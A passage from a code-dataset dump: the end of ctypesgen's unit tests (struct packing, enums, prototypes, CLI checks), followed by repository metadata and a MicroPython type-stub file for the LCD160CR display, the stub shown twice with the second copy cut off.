"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "foo3",
"type": "struct",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "Int",
"type": "typedef",
},
{
"attrib": {},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "Int",
}
],
"name": "anon_8",
"type": "struct",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": True,
"errors": [],
"members": [
[
"Int",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
]
],
"opaque": False,
"attrib": {},
"src": ["/some-path/temp.h", 77],
"tag": "anon_8",
"variety": "struct",
},
"name": "id_struct_t",
"type": "typedef",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": False,
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"attrib": {},
"src": ["/some-path/temp.h", 3],
"tag": "foo",
"variety": "struct",
},
"name": "foo",
"type": "typedef",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": False,
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"attrib": {"packed": True},
"src": ["/some-path/temp.h", 12],
"tag": "packed_foo",
"variety": "struct",
},
"name": "packed_foo",
"type": "typedef",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": False,
"attrib": {"aligned": [2], "packed": True},
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"src": ["/some-path/temp.h", 56],
"tag": "pragma_packed_foo2",
"variety": "struct",
},
"name": "pragma_packed_foo2",
"type": "typedef",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": False,
"attrib": {},
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"src": ["/some-path/temp.h", 66],
"tag": "foo3",
"variety": "struct",
},
"name": "foo3",
"type": "typedef",
},
]
compare_json(self, self.json, json_ans, True)
def test_fields(self):
"""Test whether fields are built correctly.
"""
struct_foo = self.module.struct_foo
self.assertEqual(
struct_foo._fields_,
[
("a", ctypes.c_int),
("b", ctypes.c_char),
("c", ctypes.c_int),
("d", ctypes.c_int, 15),
("unnamed_1", ctypes.c_int, 17),
],
)
def test_pack(self):
"""Test whether gcc __attribute__((packed)) is interpreted correctly.
"""
unpacked_size = compute_packed(4, [ctypes.c_int] * 3 + [ctypes.c_char])
packed_size = compute_packed(1, [ctypes.c_int] * 3 + [ctypes.c_char])
struct_foo = self.module.struct_foo
struct_packed_foo = self.module.struct_packed_foo
foo_t = self.module.foo_t
packed_foo_t = self.module.packed_foo_t
self.assertEqual(getattr(struct_foo, "_pack_", 0), 0)
self.assertEqual(getattr(struct_packed_foo, "_pack_", 0), 1)
self.assertEqual(getattr(foo_t, "_pack_", 0), 0)
self.assertEqual(getattr(packed_foo_t, "_pack_", -1), 1)
self.assertEqual(ctypes.sizeof(struct_foo), unpacked_size)
self.assertEqual(ctypes.sizeof(foo_t), unpacked_size)
self.assertEqual(ctypes.sizeof(struct_packed_foo), packed_size)
self.assertEqual(ctypes.sizeof(packed_foo_t), packed_size)
def test_pragma_pack(self):
"""Test whether #pragma pack(...) is interpreted correctly.
"""
packed4_size = compute_packed(4, [ctypes.c_int] * 3 + [ctypes.c_char])
packed2_size = compute_packed(2, [ctypes.c_int] * 3 + [ctypes.c_char])
unpacked_size = compute_packed(4, [ctypes.c_int] * 3 + [ctypes.c_char])
pragma_packed_foo_t = self.module.pragma_packed_foo_t
struct_pragma_packed_foo2 = self.module.struct_pragma_packed_foo2
struct_foo3 = self.module.struct_foo3
self.assertEqual(getattr(pragma_packed_foo_t, "_pack_", 0), 4)
self.assertEqual(getattr(struct_pragma_packed_foo2, "_pack_", 0), 2)
self.assertEqual(getattr(struct_foo3, "_pack_", 0), 0)
self.assertEqual(ctypes.sizeof(pragma_packed_foo_t), packed4_size)
self.assertEqual(ctypes.sizeof(struct_pragma_packed_foo2), packed2_size)
self.assertEqual(ctypes.sizeof(struct_foo3), unpacked_size)
def test_typedef_vs_field_id(self):
"""Test whether local field identifier names can override external
typedef names.
"""
Int = self.module.Int
id_struct_t = self.module.id_struct_t
self.assertEqual(Int, ctypes.c_int)
self.assertEqual(id_struct_t._fields_, [("Int", ctypes.c_int)])
class MathTest(unittest.TestCase):
"""Based on math_functions.py"""
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = """
#include <math.h>
#define sin_plus_y(x,y) (sin(x) + (y))
"""
if sys.platform == "win32":
# pick something from %windir%\system32\msvc*dll that include stdlib
libraries = ["msvcrt.dll"]
libraries = ["msvcrt"]
elif sys.platform.startswith("linux"):
libraries = ["libm.so.6"]
else:
libraries = ["libc"]
self.module, output = ctypesgentest.test(header_str, libraries=libraries, all_headers=True)
def tearDown(self):
del self.module
ctypesgentest.cleanup()
def test_sin(self):
"""Based on math_functions.py"""
module = self.module
self.assertEqual(module.sin(2), math.sin(2))
def test_sqrt(self):
"""Based on math_functions.py"""
module = self.module
self.assertEqual(module.sqrt(4), 2)
def local_test():
module.sin("foobar")
self.assertRaises(ctypes.ArgumentError, local_test)
def test_bad_args_string_not_number(self):
"""Based on math_functions.py"""
module = self.module
def local_test():
module.sin("foobar")
self.assertRaises(ctypes.ArgumentError, local_test)
def test_subcall_sin(self):
"""Test math with sin(x) in a macro"""
module = self.module
self.assertEqual(module.sin_plus_y(2, 1), math.sin(2) + 1)
class EnumTest(unittest.TestCase):
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = """
typedef enum {
TEST_1 = 0,
TEST_2
} test_status_t;
"""
libraries = None
self.module, output = ctypesgentest.test(header_str)
self.json, output = ctypesgentest.test(header_str, output_language="json")
cleanup_json_src_paths(self.json)
def tearDown(self):
del self.module, self.json
ctypesgentest.cleanup()
def test_enum(self):
self.assertEqual(self.module.TEST_1, 0)
self.assertEqual(self.module.TEST_2, 1)
def test_enum_json(self):
json_ans = [
{
"fields": [
{
"ctype": {"Klass": "ConstantExpressionNode", "errors": [], "value": 0},
"name": "TEST_1",
},
{
"ctype": {
"Klass": "BinaryExpressionNode",
"can_be_ctype": [False, False],
"errors": [],
"format": "(%s + %s)",
"left": {
"Klass": "IdentifierExpressionNode",
"errors": [],
"name": "TEST_1",
},
"name": "addition",
"right": {"Klass": "ConstantExpressionNode", "errors": [], "value": 1},
},
"name": "TEST_2",
},
],
"name": "anon_2",
"type": "enum",
},
{"name": "TEST_1", "type": "constant", "value": "0"},
{"name": "TEST_2", "type": "constant", "value": "(TEST_1 + 1)"},
{
"ctype": {
"Klass": "CtypesEnum",
"anonymous": True,
"enumerators": [
["TEST_1", {"Klass": "ConstantExpressionNode", "errors": [], "value": 0}],
[
"TEST_2",
{
"Klass": "BinaryExpressionNode",
"can_be_ctype": [False, False],
"errors": [],
"format": "(%s + %s)",
"left": {
"Klass": "IdentifierExpressionNode",
"errors": [],
"name": "TEST_1",
},
"name": "addition",
"right": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 1,
},
},
],
],
"errors": [],
"opaque": False,
"src": ["/some-path/temp.h", 2],
"tag": "anon_2",
},
"name": "test_status_t",
"type": "typedef",
},
]
compare_json(self, self.json, json_ans)
class PrototypeTest(unittest.TestCase):
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = """
int bar2(int a);
int bar(int);
void foo(void);
void foo2(void) __attribute__((stdcall));
void * __attribute__((stdcall)) foo3(void);
void * __attribute__((stdcall)) * foo4(void);
void foo5(void) __attribute__((__stdcall__));
"""
libraries = None
self.json, output = ctypesgentest.test(header_str, output_language="json")
cleanup_json_src_paths(self.json)
def tearDown(self):
del self.json
ctypesgentest.cleanup()
def test_function_prototypes_json(self):
json_ans = [
{
"args": [
{
"Klass": "CtypesSimple",
"errors": [],
"identifier": "a",
"longs": 0,
"name": "int",
"signed": True,
}
],
"attrib": {},
"name": "bar2",
"return": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"type": "function",
"variadic": False,
},
{
"args": [
{
"Klass": "CtypesSimple",
"errors": [],
"identifier": "",
"longs": 0,
"name": "int",
"signed": True,
}
],
"attrib": {},
"name": "bar",
"return": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"type": "function",
"variadic": False,
},
{
"args": [],
"attrib": {},
"name": "foo",
"return": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "void",
"signed": True,
},
"type": "function",
"variadic": False,
},
{
"args": [],
"attrib": {"stdcall": True},
"name": "foo2",
"return": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "void",
"signed": True,
},
"type": "function",
"variadic": False,
},
{
"args": [],
"attrib": {"stdcall": True},
"name": "foo3",
"return": {
"Klass": "CtypesPointer",
"destination": {"Klass": "CtypesSpecial", "errors": [], "name": "c_ubyte"},
"errors": [],
"qualifiers": [],
},
"type": "function",
"variadic": False,
},
{
"args": [],
"attrib": {"stdcall": True},
"name": "foo4",
"return": {
"Klass": "CtypesPointer",
"destination": {
"Klass": "CtypesPointer",
"destination": {
# this return type seems like it really ought to be
# the same as for foo3
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "void",
"signed": True,
},
"errors": [],
"qualifiers": [],
},
"errors": [],
"qualifiers": [],
},
"type": "function",
"variadic": False,
},
{
"args": [],
"attrib": {"stdcall": True},
"name": "foo5",
"return": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "void",
"signed": True,
},
"type": "function",
"variadic": False,
},
]
compare_json(self, self.json, json_ans, True)
class LongDoubleTest(unittest.TestCase):
"Test correct parsing and generation of 'long double' type"
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = """
struct foo
{
long double is_bar;
int a;
};
"""
self.module, _ = ctypesgentest.test(header_str) # , all_headers=True)
def tearDown(self):
del self.module
ctypesgentest.cleanup()
def test_longdouble_type(self):
"""Test is long double is correctly parsed"""
module = self.module
struct_foo = module.struct_foo
self.assertEqual(
struct_foo._fields_, [("is_bar", ctypes.c_longdouble), ("a", ctypes.c_int)]
)
class MainTest(unittest.TestCase):
script = os.path.join(test_directory, os.pardir, os.pardir, "run.py")
"""Test primary entry point used for ctypesgen when called as executable:
ctypesgen.main.main()
This test does not directly execute the script that is autogenerated by
setup.py, but does instead test the entry point as used by that script by
executing `run.py`. `run.py` is a local work-alike (as compared to the
setuptools-autogenerated script) that is only meant to be run in its *in*
the root of source code tree.
"""
@staticmethod
def _exec(args):
if sys.platform == "win32":
pyexec = "python"
else:
pyexec = "python{}".format(sys.version_info.major)
p = Popen([pyexec, MainTest.script] + args, stdout=PIPE, stderr=PIPE)
o, e = p.communicate()
return o, e, p.returncode
def test_version(self):
"""Test version string returned by script interface"""
o, e, c = self._exec(["--version"])
self.assertEqual(c, 0)
self.assertEqual(o.decode().strip(), ctypesgentest.ctypesgen.VERSION)
self.assertEqual(e.decode(), "")
def test_help(self):
"""Test that script at least generates a help"""
o, e, c = self._exec(["--help"])
self.assertEqual(c, 0)
self.assertEqual(
o.decode().splitlines()[0], "Usage: run.py [options] /path/to/header.h ..."
)
self.assertGreater(len(o), 3000) # its long, so it must be the generated help
self.assertEqual(e.decode(), "")
def test_invalid_option(self):
"""Test that script at least generates a help"""
o, e, c = self._exec(["--oh-what-a-goose-i-am"])
self.assertEqual(c, 2)
self.assertEqual(o.decode(), "")
self.assertEqual(
e.decode().splitlines()[0], "Usage: run.py [options] /path/to/header.h ..."
)
self.assertIn("run.py: error: no such option: --oh-what-a-goose-i-am", e.decode())
class UncheckedTest(unittest.TestCase):
"""Fixing a bug in 1.0.0 - basic type returns of function pointers get treated as pointers"""
def setUp(self):
"""NOTE this is called once for each test* method
(it is not called once per class).
FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
"""
header_str = """
typedef int (*some_type_of_answer)(void*);
"""
self.module, self.output = ctypesgentest.test(header_str, all_headers=False)
def test_unchecked_prototype(self):
"""Test is function type marked UNCHECKED (function pointer returning int) is handled correctly"""
module = self.module
A = module.some_type_of_answer()
self.assertEqual(A.restype, ctypes.c_int)
self.assertEqual(A.argtypes, (ctypes.c_void_p,))
def tearDown(self):
del self.module
ctypesgentest.cleanup()
def main(argv=None):
if argv is None:
argv = sys.argv
ctypesgentest.ctypesgen.messages.log.setLevel(logging.CRITICAL) # do not log anything
unittest.main()
return 0
if __name__ == "__main__":
sys.exit(main())
| 58,852 | 5,623 | 790 |
ed6d3463406712dea80304bda0142186ee00fea2 | 16,056 | py | Python | stubs/micropython-latest-docstubs/lcd160cr.py | mattytrentini/micropython-stubs | 4d596273823b69e9e5bcf5fa67f249c374ee0bbc | [
"MIT"
] | null | null | null | stubs/micropython-latest-docstubs/lcd160cr.py | mattytrentini/micropython-stubs | 4d596273823b69e9e5bcf5fa67f249c374ee0bbc | [
"MIT"
] | null | null | null | stubs/micropython-latest-docstubs/lcd160cr.py | mattytrentini/micropython-stubs | 4d596273823b69e9e5bcf5fa67f249c374ee0bbc | [
"MIT"
] | null | null | null | """
control of LCD160CR display. See: https://docs.micropython.org/en/latest/library/lcd160cr.html
This module provides control of the MicroPython LCD160CR display.
"""
# source version: latest
# origin module:: micropython/docs/library/lcd160cr.rst
from typing import Any, Tuple
from .machine import SPI
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
PORTRAIT: Any
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
LANDSCAPE: Any
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
PORTRAIT_UPSIDEDOWN: Any
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
LANDSCAPE_UPSIDEDOWN: Any
# Types of start-up decoration, can be OR'ed together, used by
# :meth:`LCD160CR.set_startup_deco`.
STARTUP_DECO_NONE: Any
# Types of start-up decoration, can be OR'ed together, used by
# :meth:`LCD160CR.set_startup_deco`.
STARTUP_DECO_MLOGO: Any
# Types of start-up decoration, can be OR'ed together, used by
# :meth:`LCD160CR.set_startup_deco`.
STARTUP_DECO_INFO: Any
class LCD160CR:
"""
Construct an LCD160CR object. The parameters are:
- *connect* is a string specifying the physical connection of the LCD
display to the board; valid values are "X", "Y", "XY", "YX".
Use "X" when the display is connected to a pyboard in the X-skin
position, and "Y" when connected in the Y-skin position. "XY"
and "YX" are used when the display is connected to the right or
left side of the pyboard, respectively.
- *pwr* is a Pin object connected to the LCD's power/enabled pin.
- *i2c* is an I2C object connected to the LCD's I2C interface.
- *spi* is an SPI object connected to the LCD's SPI interface.
- *i2c_addr* is the I2C address of the display.
One must specify either a valid *connect* or all of *pwr*, *i2c* and *spi*.
If a valid *connect* is given then any of *pwr*, *i2c* or *spi* which are
not passed as parameters (i.e. they are ``None``) will be created based on the
value of *connect*. This allows to override the default interface to the
display if needed.
The default values are:
- "X" is for the X-skin and uses:
``pwr=Pin("X4")``, ``i2c=I2C("X")``, ``spi=SPI("X")``
- "Y" is for the Y-skin and uses:
``pwr=Pin("Y4")``, ``i2c=I2C("Y")``, ``spi=SPI("Y")``
- "XY" is for the right-side and uses:
``pwr=Pin("X4")``, ``i2c=I2C("Y")``, ``spi=SPI("X")``
- "YX" is for the left-side and uses:
``pwr=Pin("Y4")``, ``i2c=I2C("X")``, ``spi=SPI("Y")``
See `this image <http://micropython.org/resources/LCD160CRv10-positions.jpg>`_
for how the display can be connected to the pyboard.
"""
w: Any
# The width and height of the display, respectively, in pixels. These
# members are updated when calling :meth:`LCD160CR.set_orient` and should
# be considered read-only.
h: Any
@staticmethod
def rgb(r, g, b) -> int:
"""
Return a 16-bit integer representing the given rgb color values. The
16-bit value can be used to set the font color (see
:meth:`LCD160CR.set_text_color`) pen color (see :meth:`LCD160CR.set_pen`)
and draw individual pixels.
"""
...
@staticmethod
def clip_line(data, w, h) -> Any:
"""
Clip the given line data. This is for internal use.
"""
...
def set_power(self, on) -> None:
"""
Turn the display on or off, depending on the given value of *on*: 0 or ``False``
will turn the display off, and 1 or ``True`` will turn it on.
"""
...
def set_orient(self, orient) -> None:
"""
Set the orientation of the display. The *orient* parameter can be one
of `PORTRAIT`, `LANDSCAPE`, `PORTRAIT_UPSIDEDOWN`, `LANDSCAPE_UPSIDEDOWN`.
"""
...
def set_brightness(self, value) -> None:
"""
Set the brightness of the display, between 0 and 31.
"""
...
def set_i2c_addr(self, addr) -> None:
"""
Set the I2C address of the display. The *addr* value must have the
lower 2 bits cleared.
"""
...
def set_uart_baudrate(self, baudrate) -> None:
"""
Set the baudrate of the UART interface.
"""
...
def set_startup_deco(self, value) -> None:
"""
Set the start-up decoration of the display. The *value* parameter can be a
logical or of `STARTUP_DECO_NONE`, `STARTUP_DECO_MLOGO`, `STARTUP_DECO_INFO`.
"""
...
def save_to_flash(self) -> Any:
"""
Save the following parameters to flash so they persist on restart and power up:
initial decoration, orientation, brightness, UART baud rate, I2C address.
"""
...
def set_pixel(self, x, y, c) -> None:
"""
Set the specified pixel to the given color. The color should be a 16-bit
integer and can be created by :meth:`LCD160CR.rgb`.
"""
...
def get_pixel(self, x, y) -> Any:
"""
Get the 16-bit value of the specified pixel.
"""
...
def get_line(self, x, y, buf) -> Any:
"""
Low-level method to get a line of pixels into the given buffer.
To read *n* pixels *buf* should be *2*n+1* bytes in length. The first byte
is a dummy byte and should be ignored, and subsequent bytes represent the
pixels in the line starting at coordinate *(x, y)*.
"""
...
def screen_dump(self, buf, x=0, y=0, w=None, h=None) -> Any:
"""
Dump the contents of the screen to the given buffer. The parameters *x* and *y*
specify the starting coordinate, and *w* and *h* the size of the region. If *w*
or *h* are ``None`` then they will take on their maximum values, set by the size
of the screen minus the given *x* and *y* values. *buf* should be large enough
to hold ``2*w*h`` bytes. If it's smaller then only the initial horizontal lines
will be stored.
"""
...
def screen_load(self, buf) -> None:
"""
Load the entire screen from the given buffer.
"""
...
def set_pos(self, x, y) -> None:
"""
Set the position for text output using :meth:`LCD160CR.write`. The position
is the upper-left corner of the text.
"""
...
def set_text_color(self, fg, bg) -> None:
"""
Set the foreground and background color of the text.
"""
...
def set_font(self, font, scale=0, bold=0, trans=0, scroll=0) -> None:
"""
Set the font for the text. Subsequent calls to `write` will use the newly
configured font. The parameters are:
- *font* is the font family to use, valid values are 0, 1, 2, 3.
- *scale* is a scaling value for each character pixel, where the pixels
are drawn as a square with side length equal to *scale + 1*. The value
can be between 0 and 63.
- *bold* controls the number of pixels to overdraw each character pixel,
making a bold effect. The lower 2 bits of *bold* are the number of
pixels to overdraw in the horizontal direction, and the next 2 bits are
for the vertical direction. For example, a *bold* value of 5 will
overdraw 1 pixel in both the horizontal and vertical directions.
- *trans* can be either 0 or 1 and if set to 1 the characters will be
drawn with a transparent background.
- *scroll* can be either 0 or 1 and if set to 1 the display will do a
soft scroll if the text moves to the next line.
"""
...
def write(self, s) -> None:
"""
Write text to the display, using the current position, color and font.
As text is written the position is automatically incremented. The
display supports basic VT100 control codes such as newline and backspace.
"""
...
def set_pen(self, line, fill) -> None:
"""
Set the line and fill color for primitive shapes.
"""
...
def erase(self) -> Any:
"""
Erase the entire display to the pen fill color.
"""
...
def dot(self, x, y) -> None:
"""
Draw a single pixel at the given location using the pen line color.
"""
...
def rect_interior(self, x, y, w, h) -> None:
"""
Draw a rectangle at the given location and size using the pen line
color for the outline, and the pen fill color for the interior.
The `rect` method draws the outline and interior, while the other methods
just draw one or the other.
"""
...
def line(self, x1, y1, x2, y2) -> None:
"""
Draw a line between the given coordinates using the pen line color.
"""
...
def line_no_clip(self, x1, y1, x2, y2) -> Any:
"""
These methods are as above but don't do any clipping on the input
coordinates. They are faster than the clipping versions and can be
used when you know that the coordinates are within the display.
"""
...
def poly_dot(self, data) -> None:
"""
Draw a sequence of dots using the pen line color.
The *data* should be a buffer of bytes, with each successive pair of
bytes corresponding to coordinate pairs (x, y).
"""
...
def poly_line(self, data) -> Any:
"""
Similar to :meth:`LCD160CR.poly_dot` but draws lines between the dots.
"""
...
def touch_config(self, calib=False, save=False, irq=None) -> None:
"""
Configure the touch panel:
- If *calib* is ``True`` then the call will trigger a touch calibration of
the resistive touch sensor. This requires the user to touch various
parts of the screen.
- If *save* is ``True`` then the touch parameters will be saved to NVRAM
to persist across reset/power up.
- If *irq* is ``True`` then the display will be configured to pull the IRQ
line low when a touch force is detected. If *irq* is ``False`` then this
feature is disabled. If *irq* is ``None`` (the default value) then no
change is made to this setting.
"""
...
def is_touched(self) -> bool:
"""
Returns a boolean: ``True`` if there is currently a touch force on the screen,
``False`` otherwise.
"""
...
def get_touch(self) -> Tuple:
"""
Returns a 3-tuple of: *(active, x, y)*. If there is currently a touch force
on the screen then *active* is 1, otherwise it is 0. The *x* and *y* values
indicate the position of the current or most recent touch.
"""
...
def set_spi_win(self, x, y, w, h) -> None:
"""
Set the window that SPI data is written to.
"""
...
def fast_spi(self, flush=True) -> SPI:
"""
Ready the display to accept RGB pixel data on the SPI bus, resetting the location
of the first byte to go to the top-left corner of the window set by
:meth:`LCD160CR.set_spi_win`.
The method returns an SPI object which can be used to write the pixel data.
Pixels should be sent as 16-bit RGB values in the 5-6-5 format. The destination
counter will increase as data is sent, and data can be sent in arbitrary sized
chunks. Once the destination counter reaches the end of the window specified by
:meth:`LCD160CR.set_spi_win` it will wrap around to the top-left corner of that window.
"""
...
def show_framebuf(self, buf) -> None:
"""
Show the given buffer on the display. *buf* should be an array of bytes containing
the 16-bit RGB values for the pixels, and they will be written to the area
specified by :meth:`LCD160CR.set_spi_win`, starting from the top-left corner.
The `framebuf <framebuf.html>`_ module can be used to construct frame buffers
and provides drawing primitives. Using a frame buffer will improve
performance of animations when compared to drawing directly to the screen.
"""
...
def set_scroll(self, on) -> None:
"""
Turn scrolling on or off. This controls globally whether any window regions will
scroll.
"""
...
def set_scroll_win(self, win, x=-1, y=0, w=0, h=0, vec=0, pat=0, fill=0x07E0, color=0) -> None:
"""
Configure a window region for scrolling:
- *win* is the window id to configure. There are 0..7 standard windows for
general purpose use. Window 8 is the text scroll window (the ticker).
- *x*, *y*, *w*, *h* specify the location of the window in the display.
- *vec* specifies the direction and speed of scroll: it is a 16-bit value
of the form ``0bF.ddSSSSSSSSSSSS``. *dd* is 0, 1, 2, 3 for +x, +y, -x,
-y scrolling. *F* sets the speed format, with 0 meaning that the window
is shifted *S % 256* pixel every frame, and 1 meaning that the window
is shifted 1 pixel every *S* frames.
- *pat* is a 16-bit pattern mask for the background.
- *fill* is the fill color.
- *color* is the extra color, either of the text or pattern foreground.
"""
...
def set_scroll_win_param(self, win, param, value) -> Any:
"""
Set a single parameter of a scrolling window region:
- *win* is the window id, 0..8.
- *param* is the parameter number to configure, 0..7, and corresponds
to the parameters in the `set_scroll_win` method.
- *value* is the value to set.
"""
...
def set_scroll_buf(self, s) -> None:
"""
Set the string for scrolling in window 8. The parameter *s* must be a string
with length 32 or less.
"""
...
def jpeg(self, buf) -> None:
"""
Display a JPEG. *buf* should contain the entire JPEG data. JPEG data should
not include EXIF information. The following encodings are supported: Baseline
DCT, Huffman coding, 8 bits per sample, 3 color components, YCbCr4:2:2.
The origin of the JPEG is set by :meth:`LCD160CR.set_pos`.
"""
...
def jpeg_data(self, buf) -> None:
"""
Display a JPEG with the data split across multiple buffers. There must be
a single call to `jpeg_start` to begin with, specifying the total number of
bytes in the JPEG. Then this number of bytes must be transferred to the
display using one or more calls to the `jpeg_data` command.
"""
...
def feed_wdt(self) -> Any:
"""
The first call to this method will start the display's internal watchdog
timer. Subsequent calls will feed the watchdog. The timeout is roughly 30
seconds.
"""
...
def reset(self) -> None:
"""
Reset the display.
"""
...
| 36.995392 | 99 | 0.587506 | """
control of LCD160CR display. See: https://docs.micropython.org/en/latest/library/lcd160cr.html
This module provides control of the MicroPython LCD160CR display.
"""
# source version: latest
# origin module:: micropython/docs/library/lcd160cr.rst
from typing import Any, Tuple
from .machine import SPI
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
PORTRAIT: Any
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
LANDSCAPE: Any
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
PORTRAIT_UPSIDEDOWN: Any
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
LANDSCAPE_UPSIDEDOWN: Any
# Types of start-up decoration, can be OR'ed together, used by
# :meth:`LCD160CR.set_startup_deco`.
STARTUP_DECO_NONE: Any
# Types of start-up decoration, can be OR'ed together, used by
# :meth:`LCD160CR.set_startup_deco`.
STARTUP_DECO_MLOGO: Any
# Types of start-up decoration, can be OR'ed together, used by
# :meth:`LCD160CR.set_startup_deco`.
STARTUP_DECO_INFO: Any
class LCD160CR:
"""
Construct an LCD160CR object. The parameters are:
- *connect* is a string specifying the physical connection of the LCD
display to the board; valid values are "X", "Y", "XY", "YX".
Use "X" when the display is connected to a pyboard in the X-skin
position, and "Y" when connected in the Y-skin position. "XY"
and "YX" are used when the display is connected to the right or
left side of the pyboard, respectively.
- *pwr* is a Pin object connected to the LCD's power/enabled pin.
- *i2c* is an I2C object connected to the LCD's I2C interface.
- *spi* is an SPI object connected to the LCD's SPI interface.
- *i2c_addr* is the I2C address of the display.
One must specify either a valid *connect* or all of *pwr*, *i2c* and *spi*.
If a valid *connect* is given then any of *pwr*, *i2c* or *spi* which are
not passed as parameters (i.e. they are ``None``) will be created based on the
value of *connect*. This allows to override the default interface to the
display if needed.
The default values are:
- "X" is for the X-skin and uses:
``pwr=Pin("X4")``, ``i2c=I2C("X")``, ``spi=SPI("X")``
- "Y" is for the Y-skin and uses:
``pwr=Pin("Y4")``, ``i2c=I2C("Y")``, ``spi=SPI("Y")``
- "XY" is for the right-side and uses:
``pwr=Pin("X4")``, ``i2c=I2C("Y")``, ``spi=SPI("X")``
- "YX" is for the left-side and uses:
``pwr=Pin("Y4")``, ``i2c=I2C("X")``, ``spi=SPI("Y")``
See `this image <http://micropython.org/resources/LCD160CRv10-positions.jpg>`_
